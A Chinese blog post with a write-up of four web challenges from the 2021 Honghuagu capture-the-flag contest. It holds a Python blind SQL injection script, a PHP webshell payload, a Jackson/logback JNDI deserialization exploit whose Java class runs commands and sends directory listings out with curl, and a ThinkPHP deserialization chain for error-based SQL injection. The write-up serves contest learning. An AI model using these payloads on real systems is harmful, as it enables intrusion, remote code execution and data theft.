红明谷2021

web

happysql

测了一波,发现有黑名单

image-20210616181335714

过滤了 or sleep ' 等等 417的都是被过滤的

用|| 代替or /**/代替空格

image-20210616181342802

发现闭合方式

发现过滤substr,mid,发现可以用left,right

用集合的方式进行布尔盲注

"||"1"in/**/(left(database(),1))#

库名 ctf 由于过滤or,需要绕过information

发现这个能用

mysql.innodb_table_stats

绕过方法

"||"1"/**/in/**/(right(left((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),1),1))#

表名如下 ctf f1ag gtid slave poss

得到f1ag的表名

根据上述文章

image-20210616181354578

采用select * from f1ag 获取f1ag所有的字段值

"||"f"/**/in/**/(right(left((select/**/*/**/from/**/f1ag),1),1))#

这里有个坑 image-20210616181401065

他把-给过滤了,动态靶机懂得都懂 就是python 的uuid,flag肯定有-

所以记得做下处理

总的exp如下

# -*- coding: utf-8 -*-
# @File   : sql
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date   : 2021/4/2 10:59
import string
import requests
import os
def sqlinjet(url,payload):
    header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
        'Cookie': "UM_distinctid = 175b18dcb384ba-0f290792fb4f06-230346d-144000-175b18dcb39493;CNZZDATA1261218610 =1200642698-1605001662-%7C1605366994",
        "Content-Type": "application/x-www-form-urlencoded"
            }
    flag=''
    str = string.ascii_letters + string.digits +'{'+'}'+ '-'
    for i in range(1,100):
        for j in str:
            data = {
                'username': payload.format(j,i),
                'password': "123",
            }
            print(data['username'])
            r = requests.post(url=url,data=data,headers=header,allow_redirects=False)
            if "SQL injection detected!" in r.text:
                flag+=j
                print(flag)
            if 'url=home.php' in r.text:
                flag+=j
                print(flag)
                break
            if len(flag)>42:
                os._exit(0)
if __name__ == '__main__':
    url="http://eci-2zegxwtddgwfx2ytn8qh.cloudeci1.ichunqiu.com/login.php"
    payload_flag='"||\"{}\"/**/in/**/(right(left((select/**/*/**/from/**/f1ag),{}),1))#'
    payload_database = '"||\"{}\"/**/in/**/(right(left((select/**/database()),{}),1))#'
    payload_table='"||\"{}\"/**/in/**/(right(left((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),{}),1))#'
    sqlinjet(url,payload_flag)

write_shell

这里关键是利用file_put_contents()

image-20210616181411231

第二个参数可以传递数组

写个phpinfo

?action=upload&data[]=<?=&data[]=ph&data[]=p&data[]=info()&data[]=?>

image-20210616181420852

禁了函数

image-20210616181424783

尝试二次编码绕过

data[]=<?&data[]=eva&data[]=l(urldecode("%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2570%2565%256e%2573%256f%256e%255d%2529%253b"))?>

这段payload我在本地试出来了,估计是版本原因 发现7.2以下这个payload就没得用了

尝试用<?php包裹

发现成功了 image-20210616182449448

蚁剑连接即可

image-20210616182508551

javawewb

访问login,发现要访问json,访问后也没啥结果

POST提交点东西上去

image-20210616181429433

发现shiro的东西,搜一波最新的漏洞

CVE-2020-11989

提交个json上去image-20210616182149851

发现返回了json字符串,比赛中能看到jackjson

拿那个payload打一波试试

https://www.zhihuifly.com/t/topic/540

和fastjson差不多,先开启rmi和ldap服务

poc

package com.by.rmi;
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class ExportObject {
    public ExportObject() throws Exception {
        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();
        String line;
        while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }
        String result = sb.toString();
        Exception e = new Exception(result);
        throw e;
    }
    public static void main(String[] args) throws Exception {
        ExportObject e = new ExportObject();
    }
}

javac编译成class

python3 -m http.server --bind 0.0.0.0 8000
rjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8000/#ExportObject

payload

["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://47.96.31.86:1099/Exploit"}]

image-20210616182230034

image-20210616182241338

发现可行

改下脚本直接弹shell

image-20210616182245002

但是看了赵总的文章他说比赛的时候靶机弹shell弹不了,他是尝试外带

import java.io.BufferedReader;import java.io.InputStreamReader;public class ExportObject {    public ExportObject() throws Exception {        Process proc = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","curl http://ip:port/`ls /|base64`"});        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));        StringBuffer sb = new StringBuffer();        String line;        while((line = br.readLine()) != null) {            sb.append(line).append("\n");        }        String result = sb.toString();        Exception e = new Exception(result);        throw e;    }    public static void main(String[] args) throws Exception {        ExportObject e = new ExportObject();    }}

image-20210616182254912

easytp

www.zip分析源码

找到控制器

Application/Home/Controller/IndexController.class.php

image-20210616182301482

搜索一波该版本的反序列化利用链

反序列化sql注入

这里需要知道数据库的密码

试一试就可以了密码是root(比赛是123456)

<?phpnamespace Think\Db\Driver{    use PDO;    class Mysql{        protected $options = array(            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件        );        protected $config = array(            "debug"    => 1,            "database" => "mysql",            "hostname" => "127.0.0.1",            "hostport" => "3306",            "charset"  => "utf8",            "username" => "root",            "password" => "root"        );    }}namespace Think\Image\Driver{    use Think\Session\Driver\Memcache;    class Imagick{        private $img;        public function __construct(){            $this->img = new Memcache();        }    }}namespace Think\Session\Driver{    use Think\Model;    class Memcache{        protected $handle;        public function __construct(){            $this->handle = new Model();        }    }}namespace Think{    use Think\Db\Driver\Mysql;    class Model{        protected $options   = array();        protected $pk;        protected $data = array();        protected $db = null;        public function __construct(){            $this->db = new Mysql();            $this->options['where'] = '';            $this->pk = 'id';            $this->data[$this->pk] = array(                "table" => "mysql.user where 1=updatexml(1,user(),1)#",                "where" => "1=1"            );        }    }}namespace {    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));}

报错注入

image-20210616182310321

发现有个test,进一步查询flag在这个库里

image-20210616182318195

常规报错注入即可


文章作者: penson
文章链接: https://www.penson.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 penson !
评论
  目录

梨花香-霜雪千年